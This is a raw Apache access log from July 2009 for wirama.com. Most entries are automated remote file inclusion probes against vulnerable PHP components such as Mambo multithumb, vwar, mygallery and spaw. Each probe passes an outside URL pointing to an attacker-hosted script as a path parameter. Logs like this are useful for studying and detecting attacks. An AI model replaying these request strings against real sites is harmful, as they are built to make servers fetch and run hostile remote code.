61.78.62.84 - - [01/Jul/2009:23:57:34 -0700] "GET /logs/access_090330.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
61.78.62.84 - - [01/Jul/2009:23:58:40 -0700] "GET /logs/access_090331.log%22%20target=%22_blank//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
61.78.62.84 - - [01/Jul/2009:23:59:34 -0700] "GET /logs/access_090330.log%22%20%20target=%22_blank//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
66.96.240.245 - - [02/Jul/2009:00:01:07 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [02/Jul/2009:00:01:07 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [02/Jul/2009:00:01:07 -0700] "GET /logs/access_090601.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.78.62.84 - - [02/Jul/2009:00:02:00 -0700] "GET /logs/access_090331.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:02:07 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:02:07 -0700] "GET /logs/access_090330.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:02:07 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:03:22 -0700] "GET /logs/access_090331.log%22%20%20target=%22_blank//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:03:59 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:04:12 -0700] "GET /logs/access_090330.log%22%20%20target=%22_blank//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:04:47 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:05:29 -0700] "GET /logs/access_090601.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:05:51 -0700] "GET /logs/access_090601.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [02/Jul/2009:00:06:17 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [02/Jul/2009:00:06:18 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [02/Jul/2009:00:06:18 -0700] "GET /logs/access_090330.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:07:13 -0700] "GET /logs/access_090331.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
66.96.240.245 - - [02/Jul/2009:00:13:26 -0700] "GET /logs/access_090330.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [02/Jul/2009:00:13:28 -0700] "GET /logs/access_090330.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [02/Jul/2009:00:14:00 -0700] "GET /logs/access_090330.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [02/Jul/2009:00:15:47 -0700] "GET /logs/access_090330.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.191.112.35 - - [02/Jul/2009:00:19:48 -0700] "GET /logs/access_090330.log//vwar/convert/mvcw_conver.php?step=1&vwar_root=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.191.112.35 - - [02/Jul/2009:00:19:48 -0700] "GET /logs//vwar/convert/mvcw_conver.php?step=1&vwar_root=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.191.112.35 - - [02/Jul/2009:00:19:48 -0700] "GET /vwar/convert/mvcw_conver.php?step=1&vwar_root=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:21:15 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:21:15 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:21:18 -0700] "GET /logs/access_090601.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:21:50 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:21:52 -0700] "GET /logs/access_090601.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:21:52 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:22:28 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:22:28 -0700] "GET /logs/access_090601.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:22:31 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:23:01 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:23:01 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:23:04 -0700] "GET /logs/access_090601.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
213.171.225.234 - - [02/Jul/2009:00:24:55 -0700] "GET /logs/dm-albums/template/album.php?SECURITY_FILE=http://pokolake.land.ru/testv.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "wirama.com"
213.171.225.234 - - [02/Jul/2009:00:24:55 -0700] "GET /dm-albums/template/album.php?SECURITY_FILE=http://pokolake.land.ru/testv.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "wirama.com"
65.55.107.181 - - [02/Jul/2009:00:29:15 -0700] "GET /_private/?D=D HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
82.165.156.112 - - [02/Jul/2009:00:38:38 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.165.156.112 - - [02/Jul/2009:00:38:38 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.165.156.112 - - [02/Jul/2009:00:38:42 -0700] "GET /logs/access_090601.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.78.62.84 - - [02/Jul/2009:00:39:15 -0700] "GET /logs/access_090531.log//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:39:15 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:39:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:39:36 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:39:36 -0700] "GET /logs/access_090531.log//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:39:36 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:40:01 -0700] "GET /logs/access_090601.log//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:40:29 -0700] "GET /logs/access_090601.log//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
74.6.17.155 - - [02/Jul/2009:00:42:49 -0700] "GET /logs/access.log HTTP/1.0" 200 412082 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:44:52 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.165.156.112 - - [02/Jul/2009:00:44:52 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.165.156.112 - - [02/Jul/2009:00:44:52 -0700] "GET /logs/access_090601.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.78.62.84 - - [02/Jul/2009:00:46:28 -0700] "GET /logs/access_090331.log//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:46:44 -0700] "GET /logs/access_090331.log//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:47:49 -0700] "GET /logs/access_090401.log//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
61.78.62.84 - - [02/Jul/2009:00:48:16 -0700] "GET /logs/access_090401.log//skin/zero_vote/ask_password.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:00:57:36 -0700] "GET /logs/access_090601.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
82.165.156.112 - - [02/Jul/2009:00:57:37 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
82.165.156.112 - - [02/Jul/2009:00:57:40 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:11 -0700] "GET /logs/access_090531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:11 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:11 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:13 -0700] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:16 -0700] "GET /logs/access_090531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:16 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:16 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:17 -0700] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:19 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:20 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:20 -0700] "GET /logs/access_090531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:00:21 -0700] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:01:01:43 -0700] "GET /logs/access_090601.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "wirama.com"
82.165.156.112 - - [02/Jul/2009:01:01:53 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "wirama.com"
82.165.156.112 - - [02/Jul/2009:01:01:55 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "wirama.com"
87.118.106.133 - - [02/Jul/2009:01:03:58 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:01:03:58 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:01:03:58 -0700] "GET /logs/access_090601.log%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:09:29 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:09:36 -0700] "GET /logs/access_090331.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:09:55 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:10:02 -0700] "GET /logs/access_090331.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:10:07 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [02/Jul/2009:01:10:10 -0700] "GET /logs/access_090331.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
219.85.63.226 - - [02/Jul/2009:01:10:57 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:01:10:57 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.75.203 - - [02/Jul/2009:01:11:00 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [02/Jul/2009:01:11:00 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
219.85.63.226 - - [02/Jul/2009:01:11:02 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:01:11:02 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:01:11:02 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:01:11:02 -0700] "GET /logs/access_090401.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:01:11:05 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:01:11:06 -0700] "GET /logs/access_090401.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.75.203 - - [02/Jul/2009:01:11:10 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [02/Jul/2009:01:11:10 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [02/Jul/2009:01:11:16 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [02/Jul/2009:01:11:16 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
62.77.32.217 - - [02/Jul/2009:01:13:14 -0700] "GET /logs/access_090601.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [02/Jul/2009:01:14:47 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:01:14:59 -0700] "GET /logs/access_090330.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:01:15:49 -0700] "GET /logs/access_090401.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [02/Jul/2009:01:16:02 -0700] "GET /logs/access_090330.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
